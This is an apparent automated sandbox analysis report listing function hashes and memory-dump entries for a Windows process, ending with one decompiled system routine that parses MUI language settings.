                                    • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                    • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072F938, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                    • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                    • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                    • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FA50, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                    • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                    • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                    • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FA20, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                    • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                    • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                    • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FAB8, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FB50, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FBE8, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                    • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                    • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                    • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00730C40, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                    • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                    • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                    • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FC48, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                    • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                    • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                    • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FC30, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                    • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                    • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                    • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FD5C, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00731D80, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                    • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                    • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                    • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FE24, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                    • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                    • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                    • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FF34, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                    • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                    • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                    • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0072FFFC, Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                    • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                    • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                    • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00758788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E00758788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00758460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0073E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0075718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00758460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0075718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00758460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00758460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00758460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0075718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00732340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0074E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0073E2A8(_t322,  &_v68, _v16);
								if(E00755553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0074E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0073E2A8(_t322,  &_v68, _t236);
								if(E00755553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0075718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00732340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0074E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0073E2A8(_v12,  &_v68, _v16);
							if(E00755553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0074E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0073E2A8(_t322,  &_v68, _t269);
							if(E00755553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0075718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0073E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00732340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0074E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0073E2A8(_v12,  &_v68, _v16);
						if(E00755553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0074E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0073E2A8(_t322,  &_v68, _t296);
						if(E00755553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0073E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                    0x00758788
                                    0x00758788
                                    0x00758791
                                    0x00758794
                                    0x00758798
                                    0x0075879b
                                    0x0075879e
                                    0x007587a1
                                    0x007587a4
                                    0x007587a7
                                    0x007587aa
                                    0x007587af
                                    0x007a1ad3
                                    0x00758b0a
                                    0x00758b0d
                                    0x00758b13
                                    0x00758b19
                                    0x00758b1f
                                    0x00758b25
                                    0x00758b2b
                                    0x00758b31
                                    0x00758b37
                                    0x00758b3d
                                    0x00758b46
                                    0x00758b46
                                    0x007587c6
                                    0x007587d0
                                    0x007a1ae0
                                    0x007a1ae6
                                    0x007a1af8
                                    0x007a1af8
                                    0x007a1afd
                                    0x007a1afe
                                    0x007a1b01
                                    0x007a1b06
                                    0x007a1b06
                                    0x007587d6
                                    0x007587f2
                                    0x007587f7
                                    0x00758807
                                    0x0075880a
                                    0x0075880f
                                    0x00758810
                                    0x00758813
                                    0x00758818
                                    0x00758818
                                    0x0075882c
                                    0x00758831
                                    0x00758838
                                    0x00758908
                                    0x00758920
                                    0x007589f0
                                    0x00758a08
                                    0x00758af6
                                    0x00758af6
                                    0x00758af8
                                    0x00758afb
                                    0x007a1beb
                                    0x007a1beb
                                    0x00758b04
                                    0x007a1bf8
                                    0x007a1c0e
                                    0x007a1c13
                                    0x007a1c16
                                    0x007a1c16
                                    0x007a1bf8
                                    0x00000000
                                    0x00758b04
                                    0x00758a0e
                                    0x00758a11
